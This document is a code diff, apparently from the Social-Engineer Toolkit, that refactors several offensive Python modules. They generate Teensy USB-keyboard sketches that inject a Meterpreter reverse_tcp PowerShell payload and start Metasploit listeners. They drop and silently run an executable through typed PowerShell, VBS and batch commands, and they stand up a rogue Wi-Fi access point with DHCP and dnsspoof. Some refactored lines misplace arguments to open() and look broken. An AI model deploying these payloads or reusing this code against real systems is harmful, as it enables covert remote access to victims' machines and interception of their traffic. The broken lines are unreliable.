# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk.
@ -13,45 +24,41 @@ This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/
payload = "windows/meterpreter/reverse_tcp"
# create base metasploit payload to pass to powershell.prep
filewrite = open(setdir + "/metasploit.payload", "w")
filewrite.write(payload)
filewrite.close()
with open(os.path.join(core.setdir, "metasploit.payload"), 'w') as filewrite:
filewrite.write(payload)
ipaddr = input("Enter the IP for the reverse: ")
port = input("Enter the port for the reverse: ")
shellcode = generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
filewrite = open(setdir + "/x86.powershell", "w")
filewrite.write(shellcode)
filewrite.close()
shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
with open(os.path.join(core.setdir, 'x86.powershell', 'w')) as filewrite:
filewrite.write(shellcode)
time.sleep(3)
fileopen = open(setdir + "/x86.powershell", "r")
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
pass
# read in x amount of bytes
data_read = int(50)
# read in x amount of bytes
data_read = int(50)
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
counter = 0
while 1:
reading_encoded = fileopen.read(data_read).rstrip()
if reading_encoded == "":
break
output_variable += "const char RevShell_%s[] PROGMEM = '%s';\n" % (
counter, reading_encoded)
counter = counter + 1
counter = 0
while True:
reading_encoded = fileopen.read(data_read).rstrip()
if not reading_encoded:
break
output_variable += "const char RevShell_{0}[] PROGMEM = '{1}';\n".format(counter, reading_encoded)
counter += 1
rev_counter = 0
output_variable += "const char exploit[] PROGMEM = {\n"
while rev_counter != counter:
output_variable += "RevShell_%s" % rev_counter
rev_counter = rev_counter + 1
output_variable += "RevShell_{0}".format(rev_counter)
rev_counter += 1
if rev_counter == counter:
output_variable += "};\n"
if rev_counter != counter:
else:
output_variable += ",\n"
teensy = output_variable
@ -142,36 +149,39 @@ Keyboard.set_key1(0);
Keyboard.send_now();
}
""")
print("[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir))
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
filewrite = open(setdir + "/reports/teensy.pde", "w")
filewrite.write(teensy)
filewrite.close()
choice = yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir, "reports/teensy.pde")))
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
with open(os.path.join(core.setdir, "/reports/teensy.pde", "w")) as filewrite:
filewrite.write(teensy)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
if choice == "YES":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr)
if check_options("PORT=") != 0:
port = check_options("PORT=")
if core.check_options("PORT=") != 0:
port = core.check_options("PORT=")
else:
port = input("Enter the port to connect back on: ")
filewrite = open(setdir + "/metasploit.answers", "w")
filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload, ipaddr, port))
filewrite.close()
with open(os.path.join(core.setdir, "/metasploit.answers", "w")) as filewrite:
filewrite.write("use multi/handler\n"
"set payload {0}\n"
"set LHOST {1}\n"
"set LPORT {2}\n"
"set AutoRunScript post/windows/manage/smart_migrate\n"
"exploit -j".format(payload, ipaddr, port))
print("[*] Launching Metasploit....")
try:
child = pexpect.spawn(
"%smsfconsole -r %s/metasploit.answers\r\n\r\n" % (meta_path(), setdir))
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
os.path.join(core.setdir, "metasploit.answers")))
child.interact()
except:
pass

View file

@ -1,15 +1,14 @@
#!/usr/bin/python
import binascii
import base64
import sys
import binascii
import os
import random
import string
import subprocess
import socket
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
import src.core.setcore as core
# from src.core.setcore import *
# from src.core.dictionaries import *
# from src.core.menu.text import *
##########################################################################
#
@ -23,6 +22,13 @@ from src.core.menu.text import *
##########################################################################
##########################################################################
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# print main stuff for the application
print("""
********************************************************************
@ -48,43 +54,45 @@ print("""
enabled.\n""")
# grab the path and filename from user
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while 1:
print_warning("Filename not found, try again")
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
while True:
core.print_warning("Filename not found, try again")
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path):
break
print_warning(
"Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
print_status(
"Converting the executable to a hexadecimal form to be converted later...")
core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")
fileopen = open(path, "rb")
data = fileopen.read()
with open(path, "rb") as fileopen:
data = fileopen.read()
data = binascii.hexlify(data)
filewrite = open("converts.txt", "w")
filewrite.write(data)
print("[*] File converted successfully. It has been expored in the working directory under 'converts.txt'. Copy this one file to the teensy SDCard.")
with open("converts.txt", "w") as filewrite:
filewrite.write(data)
print("[*] File converted successfully. It has been exported in the working directory under 'converts.txt'. "
"Copy this one file to the teensy SDCard.")
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\nReading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\n" \
"Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
# this is used to write out the file
random_filename = generate_random_string(8, 15) + ".txt"
random_filename = core.generate_random_string(8, 15) + ".txt"
# powershell command here, needs to be unicoded then base64 in order to
# use encodedcommand
powershell_command = str(
"$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename, random_filename))
powershell_command = ("$s=gc \"$HOME\\AppData\\Local\\Temp\\{random_filename}\";"
"$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');"
"$b=new-object byte[] $($s.Length/2);"
"0..$($b.Length-1)|%{{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)}};"
"[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\{random_filename}.exe\",$b)".format(random_filename=random_filename))
##########################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
# there is an odd bug with python unicode, traditional unicode inserts a
# null byte after each character typically.. python does not so the encoded
# command becomes corrupt in order to get around this a null byte is pushed
# to each string value to fix this and make the encodedcommand work properly
#
##########################################################################
@ -101,9 +109,9 @@ powershell_command = blank_command
powershell_command = base64.b64encode(powershell_command)
# vbs filename
vbs = generate_random_string(10, 15) + ".vbs"
vbs = core.generate_random_string(10, 15) + ".vbs"
# .batch filename
bat = generate_random_string(10, 15) + ".bat"
bat = core.generate_random_string(10, 15) + ".bat"
# write the rest of the teensy code
output_variable += ("""
@ -118,9 +126,9 @@ void setup()
{
BlinkFast(2);
delay(5000);
CommandAtRunBar("cmd /c echo 0 > %%TEMP%%\\\\%s");
CommandAtRunBar("cmd /c echo 0 > %TEMP%\\\\{random_filename}");
delay(750);
CommandAtRunBar("notepad %%TEMP%%\\\\%s");
CommandAtRunBar("notepad %TEMP%\\\\{random_filename}");
delay(1000);
// Delete the 0
PRES(KEY_DELETE);
@ -132,11 +140,11 @@ void setup()
pinMode(10, OUTPUT);
// see if the card is present and can be initialized:
if (!SD.begin(chipSelect)) {
if (!SD.begin(chipSelect)) {{
Keyboard.println("Card failed, or not present");
// don't do anything more:
return;
}
}}
// open the file. note that only one file can be open at a time,
// so you have to close this one before opening another.
@ -147,15 +155,15 @@ void setup()
File dataFile = SD.open("converts.txt");
if (dataFile) {
fileSize = dataFile.size();
for (filePos = 0; filePos <= fileSize; filePos++) {
for (filePos = 0; filePos <= fileSize; filePos++) {{
Keyboard.print(dataFile.read(),BYTE);
delay(10);
}
}}
dataFile.close();
}
else {
}}
else {{
Keyboard.println("error opening converts.txt");
}
}}
// ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST!
delay(5000);
CtrlS();
@ -166,45 +174,45 @@ void setup()
// run through cmd
CommandAtRunBar("cmd");
delay(1000);
Keyboard.println("powershell -EncodedCommand %s");
Keyboard.println("powershell -EncodedCommand {powershell_command}");
// Tweak this delay. Larger files take longer to decode through powershell.
delay(10000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %%TEMP%%\\\\%s");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%%TEMP%%\\\\%s\\" ^& Chr(34), 0 >> %%TEMP%%\\\\%s");
Keyboard.println("echo Set WshShell = Nothing >> %%TEMP%%\\\\%s");
Keyboard.println("echo %%TEMP%%\\\\%s.exe > %%TEMP%%\\\\%s");
Keyboard.println("wscript %%TEMP%%\\\\%s");
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}");
Keyboard.println("echo Set WshShell = Nothing >> %TEMP%\\\\{vbs}");
Keyboard.println("echo %TEMP%\\\\{random_filename}.exe > %TEMP%\\\\{bat}");
Keyboard.println("wscript %TEMP%\\\\{vbs}");
delay(1000);
Keyboard.println("exit");
}
void loop () {}
}}
void loop () {{}}
void BlinkFast(int BlinkRate){
int BlinkCounter=0;
for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){
for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){{
digitalWrite(ledPin, HIGH);
delay(80);
digitalWrite(ledPin, LOW);
delay(80);
}
}
void AltF4(){
}}
}}
void AltF4(){{
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_F4);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
void CtrlS(){
}}
void CtrlS(){{
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_S);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
}}
// Taken from IronGeek
void CommandAtRunBar(char *SomeCommand){
void CommandAtRunBar(char *SomeCommand){{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
@ -217,24 +225,21 @@ void CommandAtRunBar(char *SomeCommand){
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
void PRES(int KeyCode){
}}
void PRES(int KeyCode){{
Keyboard.set_key1(KeyCode);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
""" % (random_filename, random_filename, powershell_command, vbs, bat, vbs, vbs, random_filename, bat, vbs))
}}
""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat))
# delete temporary file
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" %
(random_filename), shell=True).wait()
subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait()
print("[*] Binary to Teensy file exported as teensy.pde")
# write the teensy.pde file out
filewrite = open("teensy.pde", "w")
# write the teensy.pde file out
filewrite.write(output_variable)
# close the file
filewrite.close()
with open("teensy.pde", "w") as filewrite:
# write the teensy.pde file out
filewrite.write(output_variable)
print("""
Instructions:
@ -246,4 +251,4 @@ on.
Happy hacking.
""")
return_continue()
core.return_continue()

View file

@ -1,34 +1,44 @@
#!/usr/bin/env python
# coding=utf-8
############################
#
# Teensy HID Attack Vector
#
############################
import sys
import re
import os
import subprocess
import datetime
from src.core.setcore import *
import os
import re
import subprocess
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# pull metasploit path
msf_path = meta_path()
msf_path = core.meta_path()
# check operating system
operating_system = check_os()
operating_system = core.check_os()
now = datetime.datetime.today()
if operating_system != "windows":
import pexpect
# check to see if setdir is created
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
definepath = os.getcwd()
# define if use apache or not
apache = 0
apache = False
# open set_config here
apache_check = open("/etc/setoolkit/set.config", "r").readlines()
with open("/etc/setoolkit/set.config") as fileopen:
apache_check = fileopen.readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
@ -43,49 +53,50 @@ for line in apache_check:
if match2:
line2 = line2.rstrip()
apache_path = line2.replace("APACHE_DIRECTORY=", "")
apache = 1
apache = True
# grab info from config file
fileopen = open(setdir + "/teensy", "r")
counter = 0
payload_counter = 0
for line in fileopen:
line = line.rstrip()
if counter == 0:
choice = str(line)
if counter == 1:
payload_counter = 1
counter = counter + 1
if choice != "14":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
with open(os.path.join(core.setdir, "teensy")) as fileopen:
counter = 0
payload_counter = 0
choice = None
for line in fileopen:
line = line.rstrip()
if counter == 0:
choice = str(line)
if counter == 1:
payload_counter = 1
counter += 1
if not os.path.isfile(setdir + "/teensy"):
print_error(
"FATAL:Something went wrong, the Teensy config file was not created.")
exit_set()
if choice != "14":
# Open the IPADDR file
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr)
if not os.path.isfile(os.path.join(core.setdir, "teensy")):
core.print_error("FATAL:Something went wrong, the Teensy config file was not created.")
core.exit_set()
def writefile(filename, now):
fileopen = open("src/teensy/%s" % filename, "r")
filewrite = open(setdir + "/reports/teensy_%s.pde" % (now), "w")
for line in fileopen:
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
with open(os.path.join("src/teensy", filename)) as fileopen, \
open(os.path.join(core.setdir, "/reports/teensy_{0}.pde".format(now)), "w") as filewrite:
for line in fileopen:
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
filewrite.write(line)
filewrite.write(line)
filewrite.close()
# powershell downloader
if choice == "1":
@ -116,32 +127,47 @@ if choice == "13":
payload_counter = 0
# save our stuff here
print(bcolors.BLUE + "\n[*] PDE file created. You can get it under '%s/reports/teensy_%s.pde' " % (setdir, now) + bcolors.ENDC)
print(bcolors.GREEN + '[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' + bcolors.ENDC)
print(bcolors.RED + "\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" + bcolors.ENDC)
print(core.bcolors.BLUE +
"\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir,
"reports",
"teensy_{0}.pde".format(now))) +
core.bcolors.ENDC)
print(core.bcolors.GREEN +
'[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' +
core.bcolors.ENDC)
print(core.bcolors.RED +
"\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" +
core.bcolors.ENDC)
pause = input("Press {return} to continue.")
if payload_counter == 1:
if apache == 0:
subprocess.Popen("mkdir %s/web_clone/;cp %s/msf.exe %s/web_clone/x.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir, setdir), shell=True).wait()
webclone_path = os.path.join(core.setdir, "web_clone")
metasploit_exec_path = os.path.join(core.setdir, "msf.exe")
if not apache:
subprocess.Popen("mkdir {0};"
"cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path,
metasploit_exec_path,
os.path.join(webclone_path, "x.exe")),
shell=True).wait()
if operating_system != "windows":
child = pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp %s/msf.exe %s/x.exe" %
(setdir, apache_path), shell=True).wait()
if os.path.isfile(setdir + "/meta_config"):
print(bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC)
else:
subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path, "x.exe")), shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC)
try:
if operating_system != "windows":
child1 = pexpect.spawn(
"%smsfconsole -r %s/meta_config\r\n\r\n" % (msf_path, setdir))
child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "meta_config")))
child1.interact()
except:
if operating_system != "windows":
if apache == 0:
if not apache:
child.close()
child1.close()

View file

@ -1,39 +1,43 @@
#!/usr/bin/env python
# coding=utf-8
import subprocess
from src.core.setcore import *
import src.core.setcore as core
#
# Simple python script to kill things created by the SET wifi attack vector
#
interface = input(
setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
interface = input(core.setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
# fix a bug if present
print_status(
"Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;rfkill block all;rfkill unblock all;modprobe rtl8187;rfkill unblock all;ifconfig %s up" % (
interface), shell=True).wait()
core.print_status("Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;"
"rfkill block all;"
"rfkill unblock all;"
"modprobe rtl8187;"
"rfkill unblock all;"
"ifconfig {0} up".format(interface),
shell=True).wait()
print_status("Killing airbase-ng...")
core.print_status("Killing airbase-ng...")
subprocess.Popen("killall airbase-ng", shell=True).wait()
print_status("Killing dhcpd3 and dhclient3...")
core.print_status("Killing dhcpd3 and dhclient3...")
subprocess.Popen("killall dhcpd3", shell=True).wait()
subprocess.Popen("killall dhclient3", shell=True).wait()
print_status("Killing dnsspoof...")
core.print_status("Killing dnsspoof...")
subprocess.Popen("killall dnsspoof", shell=True).wait()
print_status("Turning off IP_forwarding...")
core.print_status("Turning off IP_forwarding...")
subprocess.Popen("echo 0 > /proc/sys/net/ipv4/ip_forward", shell=True).wait()
print_status("Killing monitor mode on mon0...")
core.print_status("Killing monitor mode on mon0...")
subprocess.Popen("src/wireless/airmon-ng stop mon0", shell=True).wait()
print_status("Turning off monitor mode on wlan0...")
core.print_status("Turning off monitor mode on wlan0...")
subprocess.Popen("src/wireless/airmon-ng stop wlan0", shell=True).wait()
print_status("SET has stopped the wireless access point. ")
return_continue()
core.print_status("SET has stopped the wireless access point. ")
core.return_continue()

View file

@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
##############################################
#
# This is a basic setup for an access point
@ -9,10 +10,9 @@
import sys
import os
import subprocess
import re
import pexpect
import time
from src.core.setcore import *
import src.core.setcore as core
from src.core.menu import text
sys.path.append("/etc/setoolkit")
@ -20,34 +20,30 @@ from set_config import AIRBASE_NG_PATH as airbase_path
from set_config import ACCESS_POINT_SSID as access_point
from set_config import AP_CHANNEL as ap_channel
from set_config import DNSSPOOF_PATH as dnsspoof_path
sys.path.append(definepath)
sys.path.append(core.definepath)
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
print_warning("isc-dhcp-server does not appear to be installed.")
print_warning(
"apt-get install isc-dhcp-server to install it. Things may fail now.")
core.print_warning("isc-dhcp-server does not appear to be installed.")
core.print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
else:
print_warning(
"DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
exit_set()
core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
core.exit_set()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
print_info("using SET's local airbase-ng binary")
core.print_info("using SET's local airbase-ng binary")
print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
print_info(
"""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
core.print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
core.print_info("""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
print("")
print_status("SET will now launch nano to edit the file.")
print_status("Press ^X to exit nano and don't forget to save the updated file!")
print_warning(
"If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
return_continue()
core.print_status("SET will now launch nano to edit the file.")
core.print_status("Press ^X to exit nano and don't forget to save the updated file!")
core.print_warning("If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
core.return_continue()
subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait()
# DHCP SERVER CONFIG HERE
@ -79,54 +75,50 @@ subnet 192.168.10.0 netmask 255.255.255.0 {
}
""")
show_fakeap_dhcp_menu = create_menu(
text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = input(setprompt(["8"], ""))
dhcptun = None
show_fakeap_dhcp_menu = core.create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = input(core.setprompt(["8"], ""))
if fakeap_dhcp_menu_choice != "":
fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice, 2)
fakeap_dhcp_menu_choice = core.check_length(fakeap_dhcp_menu_choice, 2)
# convert it to a string
fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
if fakeap_dhcp_menu_choice == "":
else:
fakeap_dhcp_menu_choice = "1"
if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out
print_status("Writing the dhcp configuration file to ~/.set")
filewrite = open(setdir + "/dhcp.conf", "w")
filewrite.write(dhcp_config1)
# close the file
filewrite.close()
core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config1)
dhcptun = 1
if fakeap_dhcp_menu_choice == "2":
# writes the dhcp server out
print_status("Writing the dhcp configuration file to ~/.set")
filewrite = open(setdir + "/dhcp.conf", "w")
filewrite.write(dhcp_config2)
# close the file
filewrite.close()
core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config2)
dhcptun = 2
if fakeap_dhcp_menu_choice == "exit":
exit_set()
core.exit_set()
interface = input(
setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
interface = input(core.setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
# place wifi interface into monitor mode
print_status("Placing card in monitor mode via airmon-ng..")
core.print_status("Placing card in monitor mode via airmon-ng..")
# if we have it already installed then don't use the SET one
if os.path.isfile("/usr/local/sbin/airmon-ng"):
airmonng_path = "/usr/local/sbin/airmon-ng"
if not os.path.isfile("/usr/local/sbin/airmon-ng"):
else:
airmonng_path = "src/wireless/airmon-ng"
monproc = subprocess.Popen("%s start %s | grep \"monitor mode enabled on\" | cut -d\" \" -f5 | sed -e \'s/)$//\'" %
(airmonng_path, interface), shell=True, stdout=subprocess.PIPE)
monproc = subprocess.Popen("{0} start {1} |"
"grep \"monitor mode enabled on\" |"
"cut -d\" \" -f5 |"
"sed -e \'s/)$//\'".format(airmonng_path, interface),
shell=True, stdout=subprocess.PIPE)
moniface = monproc.stdout.read()
monproc.wait()
@ -134,47 +126,39 @@ monproc.wait()
subprocess.Popen("modprobe tun", shell=True).wait()
# create a fake access point
print_status("Spawning airbase-ng in a seperate child thread...")
child = pexpect.spawn('%s -P -C 20 -e "%s" -c %s %s' %
(airbase_path, access_point, ap_channel, moniface))
print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
core.print_status("Spawning airbase-ng in a separate child thread...")
child = pexpect.spawn('{0} -P -C 20 -e "{1}" -c {2} {3}'.format(airbase_path, access_point, ap_channel, moniface))
core.print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
time.sleep(15)
# bring the interface up
if dhcptun == 1:
print_status("Bringing up the access point interface...")
core.print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen(
"ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen(
"route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
subprocess.Popen("route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
if dhcptun == 2:
print_status("Bringing up the access point interface...")
core.print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen(
"ifconfig at0 192.168.10.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 192.168.10.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen(
"route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1", shell=True).wait()
subprocess.Popen("route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1", shell=True).wait()
# starts a dhcp server
print_status("Starting the DHCP server on a seperate child thread...")
core.print_status("Starting the DHCP server on a separate child thread...")
child2 = pexpect.spawn("service isc-dhcp-server start")
# starts ip_forwarding
print_status("Starting IP Forwarding...")
core.print_status("Starting IP Forwarding...")
child3 = pexpect.spawn("echo 1 > /proc/sys/net/ipv4/ip_forward")
# start dnsspoof
print_status("Starting DNSSpoof in a seperate child thread...")
child4 = pexpect.spawn("%s -i at0" % (dnsspoof_path))
core.print_status("Starting DNSSpoof in a separate child thread...")
child4 = pexpect.spawn("{0} -i at0".format(dnsspoof_path))
print_status(
"SET has finished creating the attack. If you experienced issues please report them.")
print_status(
"Now launch SET attack vectors within the menus and have a victim connect via wireless.")
print_status(
"Be sure to come back to this menu to stop the services once your finished.")
return_continue()
core.print_status("SET has finished creating the attack. If you experienced issues please report them.")
core.print_status("Now launch SET attack vectors within the menus and have a victim connect via wireless.")
core.print_status("Be sure to come back to this menu to stop the services once your finished.")
core.return_continue()